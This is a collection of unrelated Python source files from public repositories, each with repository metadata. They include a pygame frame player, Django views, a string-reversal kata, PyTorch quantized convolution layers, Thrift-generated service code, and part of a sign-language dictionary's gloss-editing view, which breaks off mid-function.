55af5cfb37587b08123b404cf8768d83148cb046
refs/heads/main
2023-07-08T02:23:22.984816
2021-08-10T10:45:01
2021-08-10T10:45:01
349,864,518
3
0
null
null
null
null
UTF-8
Python
false
false
1,820
py
"""coding: utf -8 """ # モジュールの読み込み import sys import time import pygame from pygame.locals import QUIT # pygame の初期化 pygame.init() # 画像の読み込み # FRAME_COUNT = 380 FRAME_COUNT = 528 #FRAME_COUNT = 960 # FRAME_COUNT = 4560 #FRAME_COUNT = 1520 FPS = 8 # 例えば 15 フレームで撮影するなら、ゲーム画面はその半分の FPS ならコマ飛びを感じないぐらい IMAGE1 = pygame.image.load('./@share/out-cstep4-0.png') IMAGE1_W = IMAGE1.get_width() # 画像の横幅の取得 IMAGE1_H = IMAGE1.get_height() # 画像の高さの取得 DISPLAY_SIZE = (IMAGE1_W, IMAGE1_H) # width, height SURFACE = pygame.display.set_mode(DISPLAY_SIZE) # アプリケーションウィンドウ pygame.display.set_caption('Application: pygame00.py') CLOCK = pygame.time.Clock() # フレームレート制御のための Clock オブジェクト # 画像の先読み FRAMES = [] for i in range(0, FRAME_COUNT): IMAGE1 = pygame.image.load(f'./@share/out-cstep4-{i}.png') FRAMES.append(IMAGE1) # メインループ WHITE = (255, 255, 255) TOP_LEFT_P = (0, 0) # x, y for j in range(0, 1): # 1ループ # 2ループ for i in range(0, FRAME_COUNT): # SURFACE.fill(WHITE) # 背景の色 SURFACE.blit(FRAMES[i], TOP_LEFT_P) # ボールの描画 # イベントキューを処理するループ for ev in pygame.event.get(): if ev.type == QUIT: # 「終了」イベント pygame.quit() print('quitting...') sys.exit() # ディスプレイの更新 pygame.display.update() if j == 0 and i == 0: time.sleep(3) # Seconds # フレームレートの設定 CLOCK.tick(FPS) # fps を指定 time.sleep(3) # Seconds
b85a75aeafda4547a9db1b598e1d8f93af10c136
3b628230666e2324b325d29ed8997a905dcba291
/web/views/report.py
17aff5f6356ae5632f81eedc4114595ae36f8fbe
[]
no_license
emohamed/obshtestvo.bg
9f67734776ecdef5dfc5238a9caabd97c5e80cbd
b90c547a880294cc84956eb926413fb7118be133
refs/heads/master
2020-12-25T20:30:38.667603
2016-01-06T16:44:33
2016-01-06T16:46:01
null
0
0
null
null
null
null
UTF-8
Python
false
false
238
py
from django.views.generic.base import View from restful.decorators import restful_view_templates @restful_view_templates class ReportView(View): def get(self, request): return { "page": "inner report", }
77bf3568089d84dca57ebccf21f5df9caf089b6b
c1a9436f38714277b063d76af47e8b9448d5cc73
/CRO/Molecule.py
25eaa41d932d1644507e279a2297edc8bc7924ea
[]
no_license
rakib06/LearnPythonBasic
83f5bf5c63a40e8d5f93ac3ffa0d0443fdc0519a
fc0b81850e76d38c6816bd9fe81b442b68d6bd75
refs/heads/master
2020-09-01T01:03:49.087763
2019-12-25T23:11:09
2019-12-25T23:11:09
218,835,593
0
0
null
null
null
null
UTF-8
Python
false
false
620
py
def spin_words(sentence): my_list = sentence.split() result = '' for i in range(len(my_list)): x = my_list[i] if len(x) >= 5: x = x[::-1] if i != 0: result = result + ' ' + x else: result += x return result s = 'rettel rettel Kata than in etirW than desrever the in gnirts gnirts' def spin_word_kata(sentence): return " ".join([x[::-1] if len(x)>=5 else x for x in sentence.split()]) print(spin_word_kata(s)) my_list = ['hello', 'how', 'are', 'you'] print(' '.join(my_list), end='\n') print(' '.join([x[::-1] if x != 'you' else x for x in my_list]))
02c2c129135e6b8b655b6a7764566dd3e703f0b2
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
/python/python_13280.py
2846b517a21df83a34ad11137da1ded0a3e9d792
[]
no_license
AK-1121/code_extraction
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
5297a4a3aab3bb37efa24a89636935da04a1f8b6
refs/heads/master
2020-05-23T08:04:11.789141
2015-10-22T19:19:40
2015-10-22T19:19:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
89
py
# Django: Formset for adding captions to uploaded images {{ form.instance.resized_img }}
f19ffd2d0507b157f08f52ba3d59cf3a0d343ef3
ca59d18e503ef22fbc920c6de48ffc8eac5a1443
/tools/pytorch-quantization/pytorch_quantization/nn/modules/quant_conv.py
9aaf19a265cb987212f13e71af3c256ce3cfe589
[ "Apache-2.0", "BSD-2-Clause", "BSD-3-Clause", "ISC", "MIT" ]
permissive
boh-inspur/TensorRT
9fc0ae0ad4e31da040d10728b63d9dc284852b67
e4d2f7f4406f1c8f4632cc67de33728cef90ca29
refs/heads/master
2023-04-13T21:24:13.912673
2021-04-23T09:55:18
2021-04-23T09:55:18
265,431,588
0
0
Apache-2.0
2021-04-23T09:55:19
2020-05-20T02:49:58
null
UTF-8
Python
false
false
16,356
py
# # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Quantized convolution Base code is from nn.Conv, details of Module and original argument can be found there. Module names are intentionally kept same as unquantized version so that they can be dropped into preexisting model easily, and load pretrained weight. Aliases with Quant prefix are defined and are encouraged to be used explicitly when start scratch. """ import torch import torch.nn import torch.nn.functional as F from torch.nn.modules.utils import _single, _pair, _triple from torch.nn.modules.conv import _ConvTransposeNd from pytorch_quantization import tensor_quant from . import _utils __all__ = [ "Conv2d", "QuantConv2d", "Conv3d", "QuantConv3d", "Conv1d", "QuantConv1d", "ConvTranspose1d", "ConvTranspose2d", "ConvTranspose3d", "QuantConvTranspose1d", "QuantConvTranspose2d", "QuantConvTranspose3d" ] class _QuantConvNd(torch.nn.modules.conv._ConvNd, _utils.QuantMixin): """base class of quantized Conv inherited from _ConvNd Comments of original arguments can be found in torch.nn.modules.conv Arguments: quant_desc_input: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`. Quantization descriptor of input. quant_desc_weight: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`. Quantization descriptor of weight. Raises: ValueError: If unsupported arguments are passed in. Readonly properties: - input_quantizer: - weight_quantizer: Static methods: - set_default_quant_desc_input: Set default_quant_desc_input - set_default_quant_desc_weight: Set default_quant_desc_weight """ default_quant_desc_input = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR def __init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, transposed, output_padding, groups, bias, padding_mode, quant_desc_input, quant_desc_weight): super(_QuantConvNd, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, transposed, output_padding, groups, bias, padding_mode) self.init_quantizer(quant_desc_input, quant_desc_weight) def _quant(self, input): """Apply quantization on input and weight Function called by the classes lower in the hierarchy, which actually performs the quantization before forward in the derivate class the particular Function. Arguments: input: in_features to quantize Returns: A tuple: (quant_in_feature, quant_weight) """ quant_input = self._input_quantizer(input) quant_weight = self._weight_quantizer(self.weight) return (quant_input, quant_weight) class QuantConv2d(_QuantConvNd): """Quantized 2D conv""" default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV2D_WEIGHT_PER_CHANNEL def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', **kwargs): kernel_size = _pair(kernel_size) stride = _pair(stride) padding = _pair(padding) dilation = _pair(dilation) quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs) super(QuantConv2d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False, _pair(0), groups, bias, padding_mode, quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight) def forward(self, input): # the actual quantization happens in the next level of the class hierarchy quant_input, quant_weight = self._quant(input) if self.padding_mode == 'circular': expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2, (self.padding[0] + 1) // 2, self.padding[0] // 2) output = F.conv2d(F.pad(quant_input, expanded_padding, mode='circular'), quant_weight, self.bias, self.stride, _pair(0), self.dilation, self.groups) else: output = F.conv2d(quant_input, quant_weight, self.bias, self.stride, self.padding, self.dilation, self.groups) return output class QuantConv3d(_QuantConvNd): """Quantized 3D Conv""" default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV3D_WEIGHT_PER_CHANNEL def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', **kwargs): kernel_size = _triple(kernel_size) stride = _triple(stride) padding = _triple(padding) dilation = _triple(dilation) quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs) super(QuantConv3d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False, _triple(0), groups, bias, padding_mode, quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight) def forward(self, input): # the actual quantization happens in the next level of the class hierarchy quant_input, quant_weight = self._quant(input) if self.padding_mode == 'circular': expanded_padding = ((self.padding[2] + 1) // 2, self.padding[2] // 2, (self.padding[1] + 1) // 2, self.padding[1] // 2, (self.padding[0] + 1) // 2, self.padding[0] // 2) output = F.conv3d(F.pad(quant_input, expanded_padding, mode='circular'), quant_weight, self.bias, self.stride, _triple(0), self.dilation, self.groups) else: output = F.conv3d(quant_input, quant_weight, self.bias, self.stride, self.padding, self.dilation, self.groups) return output class QuantConv1d(_QuantConvNd): """Quantized 1D Conv""" default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV1D_WEIGHT_PER_CHANNEL def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', **kwargs): kernel_size = _single(kernel_size) stride = _single(stride) padding = _single(padding) dilation = _single(dilation) quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs) super(QuantConv1d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False, _single(0), groups, bias, padding_mode, quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight) def forward(self, input): # the actual quantization happens in the next level of the class hierarchy quant_input, quant_weight = self._quant(input) if self.padding_mode == 'circular': expanded_padding = ((self.padding[0] + 1) // 2, self.padding[0] // 2) output = F.conv1d(F.pad(quant_input, expanded_padding, mode='circular'), quant_weight, self.bias, self.stride, _single(0), self.dilation, self.groups) else: output = F.conv1d(quant_input, quant_weight, self.bias, self.stride, self.padding, self.dilation, self.groups) return output class _QuantConvTransposeNd(torch.nn.modules.conv._ConvTransposeNd, _utils.QuantMixin): """base class of quantized Transposed Conv inherited from _ConvTransposeNd Comments of original arguments can be found in torch.nn.modules.conv Arguments: quant_desc_input: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`. Quantization descriptor of input. quant_desc_weight: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`. Quantization descriptor of weight. Raises: ValueError: If unsupported arguments are passed in. Readonly properties: - input_quantizer: - weight_quantizer: Static methods: - set_default_quant_desc_input: Set default_quant_desc_input - set_default_quant_desc_weight: Set default_quant_desc_weight """ default_quant_desc_input = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR def __init__(self, in_channels, out_channels, kernel_size, stride, padding, dilation, transposed, output_padding, groups, bias, padding_mode, quant_desc_input, quant_desc_weight): super(_QuantConvTransposeNd, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, transposed, output_padding, groups, bias, padding_mode) self.init_quantizer(quant_desc_input, quant_desc_weight) def _quant(self, input): """Apply quantization on input and weight Function called by the classes lower in the hierarchy, which actually performs the quantization before forward in the derivate class the particular Function. Arguments: input: in_features to quantize Returns: A tuple: (quant_in_feature, quant_weight) """ quant_input = self._input_quantizer(input) quant_weight = self._weight_quantizer(self.weight) return (quant_input, quant_weight) class QuantConvTranspose1d(_QuantConvTransposeNd): """Quantized ConvTranspose1d""" default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE1D_WEIGHT_PER_CHANNEL def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1, padding_mode='zeros', **kwargs): kernel_size = _single(kernel_size) stride = _single(stride) padding = _single(padding) dilation = _single(dilation) output_padding = _single(output_padding) quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs) super(QuantConvTranspose1d, self).__init__( in_channels, out_channels, kernel_size, stride, padding, dilation, True, output_padding, groups, bias, padding_mode, quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight) def forward(self, input, output_size=None): if self.padding_mode != 'zeros': raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose1d') output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size) quant_input, quant_weight = self._quant(input) output = F.conv_transpose1d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding, self.groups, self.dilation) return output class QuantConvTranspose2d(_QuantConvTransposeNd): """Quantized ConvTranspose2d""" default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE2D_WEIGHT_PER_CHANNEL def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1, padding_mode='zeros', **kwargs): kernel_size = _pair(kernel_size) stride = _pair(stride) padding = _pair(padding) dilation = _pair(dilation) output_padding = _pair(output_padding) quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs) super(QuantConvTranspose2d, self).__init__( in_channels, out_channels, kernel_size, stride, padding, dilation, True, output_padding, groups, bias, padding_mode, quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight) def forward(self, input, output_size=None): if self.padding_mode != 'zeros': raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose2d') output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size) quant_input, quant_weight = self._quant(input) output = F.conv_transpose2d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding, self.groups, self.dilation) return output class QuantConvTranspose3d(_QuantConvTransposeNd): """Quantized ConvTranspose3d""" default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE3D_WEIGHT_PER_CHANNEL def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1, padding_mode='zeros', **kwargs): kernel_size = _triple(kernel_size) stride = _triple(stride) padding = _triple(padding) dilation = _triple(dilation) output_padding = _triple(output_padding) quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs) super(QuantConvTranspose3d, self).__init__( in_channels, out_channels, kernel_size, stride, padding, dilation, True, output_padding, groups, bias, padding_mode, quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight) def forward(self, input, output_size=None): if self.padding_mode != 'zeros': raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose3d') output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size) quant_input, quant_weight = self._quant(input) output = F.conv_transpose3d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding, self.groups, self.dilation) return output # Define alias with Quant prefix _ConvNd = _QuantConvNd Conv1d = QuantConv1d Conv2d = QuantConv2d Conv3d = QuantConv3d ConvTranspose1d = QuantConvTranspose1d ConvTranspose2d = QuantConvTranspose2d ConvTranspose3d = QuantConvTranspose3d
d6c42962c8c27b0253171b232edbef46fb681496
b1182238bf0d26451d567e3100cea940be771ff1
/hd-thrift-idl/hd-thrift-idl-social/src/main/python/SocialAdminService/ISocialAdminServiceDeleteAdminPost.py
2ea38cd7fffadcfa9fbbd5dc18012fea42a09f4d
[]
no_license
ybg555/vue-tvBox
af6df0e07848efc1c2ac80ee8b7c16c65b790a40
57e3849e7f8272794e5a38d5e49bb68f7a44f286
refs/heads/master
2021-01-15T15:42:23.728423
2016-10-02T09:36:08
2016-10-02T09:36:08
55,936,790
1
0
null
2016-04-12T01:07:09
2016-04-11T02:52:05
Python
UTF-8
Python
false
true
6,833
py
#coding=utf-8 # # Autogenerated by Thrift Compiler (0.9.2) # # DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING # # options string: py # from thrift.Thrift import TType, TMessageType, TException, TApplicationException from ttypes import * from thrift.Thrift import TProcessor from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol, TProtocol try: from thrift.protocol import fastbinary except: fastbinary = None class Iface: def deleteAdminPost(self, post): """ 删除帖子 @param post @return @author zhijian.li Parameters: - post """ pass class Client(Iface): def __init__(self, iprot, oprot=None): self._iprot = self._oprot = iprot if oprot is not None: self._oprot = oprot self._seqid = 0 def deleteAdminPost(self, post): """ 删除帖子 @param post @return @author zhijian.li Parameters: - post """ self.send_deleteAdminPost(post) return self.recv_deleteAdminPost() def send_deleteAdminPost(self, post): self._oprot.writeMessageBegin('deleteAdminPost', TMessageType.CALL, self._seqid) args = deleteAdminPost_args() args.post = post args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_deleteAdminPost(self): iprot = self._iprot (fname, mtype, rseqid) = iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(iprot) iprot.readMessageEnd() raise x result = deleteAdminPost_result() result.read(iprot) iprot.readMessageEnd() if result.success is not None: return result.success raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteAdminPost failed: unknown result"); class Processor(Iface, TProcessor): def __init__(self, handler): self._handler = handler self._processMap = {} self._processMap["deleteAdminPost"] = Processor.process_deleteAdminPost def process(self, iprot, oprot): (name, type, seqid) = iprot.readMessageBegin() if name not in self._processMap: iprot.skip(TType.STRUCT) iprot.readMessageEnd() x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name)) oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid) x.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() return else: self._processMap[name](self, seqid, iprot, oprot) return True def process_deleteAdminPost(self, seqid, iprot, oprot): args = deleteAdminPost_args() args.read(iprot) iprot.readMessageEnd() result = deleteAdminPost_result() result.success = self._handler.deleteAdminPost(args.post) oprot.writeMessageBegin("deleteAdminPost", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() # HELPER FUNCTIONS AND STRUCTURES class deleteAdminPost_args: """ Attributes: - post """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'post', (TAdminPost.ttypes.TAdminPost, TAdminPost.ttypes.TAdminPost.thrift_spec), None, ), # 1 ) def __init__(self, post=None,): self.post = post def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.post = TAdminPost.ttypes.TAdminPost() self.post.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('deleteAdminPost_args') if self.post is not None: oprot.writeFieldBegin('post', TType.STRUCT, 1) self.post.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(self.post) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class deleteAdminPost_result: """ Attributes: - success """ thrift_spec = ( (0, TType.BOOL, 'success', None, None, ), # 0 ) def __init__(self, success=None,): self.success = success def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.BOOL: self.success = iprot.readBool(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('deleteAdminPost_result') if self.success is not None: oprot.writeFieldBegin('success', TType.BOOL, 0) oprot.writeBool(self.success) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(self.success) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other)
4ea78129b575c0fa392a02973b2e72fc68d1979c
c37414be07a423968c897887b0844830e349741f
/fastestimator/backend/to_number.py
766952ad187cb9f583dbacd315fbeb6d65a050c5
[ "Apache-2.0" ]
permissive
vbvg2008/fastestimator-future
5175047a1acac42f7172f8b9bb326486ed25a5a0
dbf7d597d1f97140f837345f6b06f1773d4fa299
refs/heads/master
2022-03-30T22:48:59.349348
2020-01-06T08:35:04
2020-01-06T08:35:04
227,687,532
0
0
null
null
null
null
UTF-8
Python
false
false
214
py
import tensorflow as tf import torch def to_number(data): if isinstance(data, tf.Tensor): data = data.numpy() elif isinstance(data, torch.Tensor): data = data.data.numpy() return data
d4b6091ec2ac16976849edd40296bf767472a246
4c14f3f73d4bf5d903a8108b22ab04523ec4d259
/signbank/dictionary/update.py
d4ec23aafd3361c4da4b65e57af9c4f33c302ce3
[ "BSD-3-Clause" ]
permissive
mbencherif/FinSL-signbank
acb8c8494a6fd644773abc06bea280dcea9be8d5
a9b3dca3f01ac4672b81de7524af1371f603f604
refs/heads/master
2020-03-29T22:34:57.117754
2018-08-01T08:25:13
2018-08-01T08:25:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
31,013
py
# -*- coding: utf-8 -*- from __future__ import unicode_literals import re import csv import codecs from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, HttpResponseBadRequest, Http404, \ HttpResponseNotAllowed, HttpResponseServerError from django.shortcuts import render, get_object_or_404, redirect, reverse from django.contrib import messages from django.contrib.contenttypes.models import ContentType from django.contrib.auth.decorators import permission_required, login_required from django.db.models.fields import NullBooleanField from django.utils.translation import ugettext as _ from django.core.exceptions import ObjectDoesNotExist, PermissionDenied from tagging.models import TaggedItem, Tag from guardian.shortcuts import get_perms, get_objects_for_user from .models import Gloss, Dataset, Translation, Keyword, Language, Dialect, GlossURL, \ GlossRelation, GlossTranslations, FieldChoice, MorphologyDefinition, RelationToForeignSign, Relation from .models import build_choice_list from .forms import TagsAddForm, TagUpdateForm, TagDeleteForm, GlossRelationForm, RelationForm, \ RelationToForeignSignForm, MorphologyForm, CSVUploadForm from ..video.models import GlossVideo @permission_required('dictionary.change_gloss') def update_gloss(request, glossid): """View to update a gloss model from the jeditable jquery form We are sent one field and value at a time, return the new value once we've updated it.""" # Get the gloss object or raise a Http404 exception if the object does not exist. gloss = get_object_or_404(Gloss, id=glossid) # Make sure that the user has rights to edit this datasets glosses. if 'view_dataset' not in get_perms(request.user, gloss.dataset): return HttpResponseForbidden(_("You do not have permissions to edit Glosses of this dataset/lexicon.")) if request.method == "POST": # Update the user on Gloss.updated_by from request.user gloss.updated_by = request.user old_idgloss = str(gloss) field = request.POST.get('id', '') value = request.POST.get('value', '') if len(value) == 0: value = ' ' elif value[0] == '_': value = value[1:] # in case we need multiple values values = request.POST.getlist('value[]') if field.startswith('keywords_'): language_code_2char = field.split('_')[1] return update_keywords(gloss, field, value, language_code_2char=language_code_2char) elif field.startswith('relationforeign'): return update_relationtoforeignsign(gloss, field, value) # Had to add field != 'relation_between_articulators' because I changed its field name, and it conflicted here. elif field.startswith('relation') and field != 'relation_between_articulators': return update_relation(gloss, field, value) elif field.startswith('morphology-definition'): return update_morphology_definition(gloss, field, value) elif field == 'dialect': # expecting possibly multiple values try: gloss.dialect.clear() for value in values: lang = Dialect.objects.get(name=value) gloss.dialect.add(lang) gloss.save() newvalue = ", ".join([str(g.name) for g in gloss.dialect.all()]) except: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s %s" % _("Unknown Dialect"), values, content_type='text/plain') elif field.startswith('video_title'): # If editing video title, update the GlossVideo's title if request.user.has_perm('video.change_glossvideo'): # Get pk after string "video_title" video_pk = field.split('video_title')[1] newvalue = value try: video = GlossVideo.objects.get(pk=video_pk) video.title = value video.save() except GlossVideo.DoesNotExist: return HttpResponseBadRequest('{error} {values}'.format(error=_('GlossVideo does not exist'), values=values), content_type='text/plain') else: return HttpResponseForbidden('Missing permission: video.change_glossvideo') elif field.startswith('glossurl-'): if field == 'glossurl-create': GlossURL.objects.create(url=value, gloss_id=glossid) return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id})) else: if request.user.has_perm('dictionary.change_gloss'): glossurl_pk = field.split('glossurl-')[1] newvalue = value try: glossurl = GlossURL.objects.get(pk=glossurl_pk) glossurl.url = value glossurl.save() except GlossURL.DoesNotExist: pass else: # Find if field is not in Gloss classes fields. if field not in [f.name for f in Gloss._meta.get_fields()]: # Translators: HttpResponseBadRequest return HttpResponseBadRequest(_("Unknown field"), content_type='text/plain') # Translate the value if a boolean if isinstance(Gloss._meta.get_field(field), NullBooleanField): newvalue = value value = (value == 'Yes') if value != ' ' or value != '': # See if the field is a ForeignKey if gloss._meta.get_field(field).get_internal_type() == "ForeignKey": gloss.__setattr__(field, FieldChoice.objects.get(machine_value=value)) else: gloss.__setattr__(field, value) gloss.save() # If the value is not a Boolean, return the new value if not isinstance(value, bool): f = Gloss._meta.get_field(field) # for choice fields we want to return the 'display' version of the value # Try to use get_choices to get correct choice names for FieldChoices # If it doesn't work, go to exception and get flatchoices try: # valdict = dict(f.get_choices(include_blank=False)) valdict = dict(build_choice_list(field)) except: valdict = dict(f.flatchoices) # Some fields take ints # if valdict.keys() != [] and type(valdict.keys()[0]) == int: try: newvalue = valdict.get(int(value), value) # else: except: # either it's not an int or there's no flatchoices # so here we use get with a default of the value itself newvalue = valdict.get(value, value) # If field is idgloss and if the value has changed # Then change the filename on system and in glossvideo.videofile if field == 'idgloss' and newvalue != old_idgloss: try: GlossVideo.rename_glosses_videos(gloss) except (OSError, IOError): # Catch error, but don't do anything for now. return HttpResponseServerError(_("Error: Unable to change videofiles names.")) return HttpResponse(newvalue, content_type='text/plain') else: return HttpResponseNotAllowed(['POST']) def update_keywords(gloss, field, value, language_code_2char): """Update the keyword field for the selected language""" # Try to get the language object based on the language_code. try: language = Language.objects.get(language_code_2char=language_code_2char) except Language.DoesNotExist: # If the language_code does not exist in any Language.language_code_2char, return 400 Bad Request. return HttpResponseBadRequest(_('A Language does not exist with language_code: ') + language_code_2char, content_type='text/plain') except Language.MultipleObjectsReturned: # If multiple Languages exist with the same language_code_2char return HttpResponseBadRequest(_('Multiple Languages with the same language_code exist, cannot edit because it ' 'is unclear which languages translations to edit.'), content_type='text/plain') (glosstranslations, created) = GlossTranslations.objects.get_or_create(gloss=gloss, language=language) glosstranslations.translations = value glosstranslations.save() # Save updated_by and updated_at field for Gloss gloss.save() return HttpResponse(value, content_type='text/plain') def update_relation(gloss, field, value): """Update one of the relations for this gloss""" (what, relid) = field.split('_') what = what.replace('-', '_') try: rel = Relation.objects.get(id=relid) except Relation.DoesNotExist: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s '%s'" % _("Bad Relation ID"), relid, content_type='text/plain') if not rel.source == gloss: # Translators: HttpResponseBadRequest return HttpResponseBadRequest(_("Relation doesn't match gloss"), content_type='text/plain') if what == 'relationdelete': print(("DELETE: ", rel)) rel.delete() return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id})) elif what == 'relationrole': # rel.role = value try: rel.role = FieldChoice.objects.get(machine_value=value) except FieldChoice.DoesNotExist: rel.role = value rel.save() # newvalue = rel.get_role_display() newvalue = rel.role elif what == 'relationtarget': target = gloss_from_identifier(value) if target: rel.target = target rel.save() newvalue = str(target) else: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s '%s'" % _("Badly formed gloss identifier"), value, content_type='text/plain') else: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain') return HttpResponse(newvalue, content_type='text/plain') def update_relationtoforeignsign(gloss, field, value): """Update one of the relations for this gloss""" (what, relid) = field.split('_') what = what.replace('-', '_') try: rel = RelationToForeignSign.objects.get(id=relid) except RelationToForeignSign.DoesNotExist: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s '%s'" % _("Bad RelationToForeignSign ID"), relid, content_type='text/plain') if not rel.gloss == gloss: # Translators: HttpResponseBadRequest return HttpResponseBadRequest(_("Relation doesn't match gloss"), 